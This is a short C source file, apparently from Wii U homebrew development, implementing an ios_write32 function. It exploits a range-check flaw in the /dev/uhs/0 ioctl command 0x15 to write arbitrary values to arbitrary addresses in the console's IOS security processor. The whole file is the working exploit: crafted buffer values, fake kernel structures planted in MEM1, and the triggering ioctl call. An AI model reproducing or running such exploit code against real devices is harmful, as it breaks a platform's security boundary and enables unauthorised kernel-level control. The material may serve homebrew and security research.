ios_write32

/*
 * Exploits range check in /dev/uhs/0 Ioctl command 0x15
 *
 * Uses IOS commands from https://github.com/darksideos/darkside-kernel/blob/wiiu/bal/src/platform/wiiu/ios.c
 * ported for usage with HBL.
 */
uint32_t ios_write32(int fd, uint32_t address, uint32_t value)
{
    int opened = 0;
    if (fd == 0)
    {
        fd = IOS_Open("/dev/uhs/0", 10, 0);
        opened = 1;
    }
    uint32_t * buffer = (uint32_t *)OSAllocFromSystem(0x70, 0x10);
    for (int i = 0; i < 0x70/4; i++) buffer[i] = 0;

    // buf_0_m = (0x10146080 + 0x144 * buffer[0] + 0x39EC)
    // buffer[0] == 0xEDC7D670 => buf_0_m = 0x100002C
    // Corresponds to virtual address 0xF500002C.
    buffer[0] = 0xEDC7D670;
    buffer[1] = value;

    // Setup MEM1 for hax
    uint32_t MEMBASE = 0xF4000000;
    uint32_t * MEM1 = (uint32_t *)0xF500002C;
    uint32_t * TEMP = (uint32_t *)0xF5300000;

    MEM1[0x4E] = 0; // if ( buf_0_m[0x4E] )
    MEM1[0x21] = ((uint32_t)MEM1) - MEMBASE; // v11 = (_DWORD *)buf_0_m[0x21];
    MEM1[0x8] = ((uint32_t)TEMP) - MEMBASE; // v12 = v11[8]
    TEMP[5] = 1; // if ( v12[5] )
    TEMP[520] = address - 0x18; //  *(_DWORD *)(v12[520] + 0x18) = buf_1;
    TEMP[33] = 0; // Guaranteed immediate return if !(*(_DWORD *)((v12+108) + 24)), or v12[33].

    DCFlushRange(MEM1, 0x1000);
    DCFlushRange(TEMP, 0x1000);
    DCFlushRange(buffer, 0x70);

    int ret = IOS_Ioctl(fd, 0x15, buffer, 0x70, NULL, 0);

    if (opened)
    {
        IOS_Close(fd);
    }

    // Small wait.
    int ctr = 0;
    for (int i = 0; i < 0x00500000; i++) ctr++;

    OSFreeToSystem(buffer);

    return ret;
}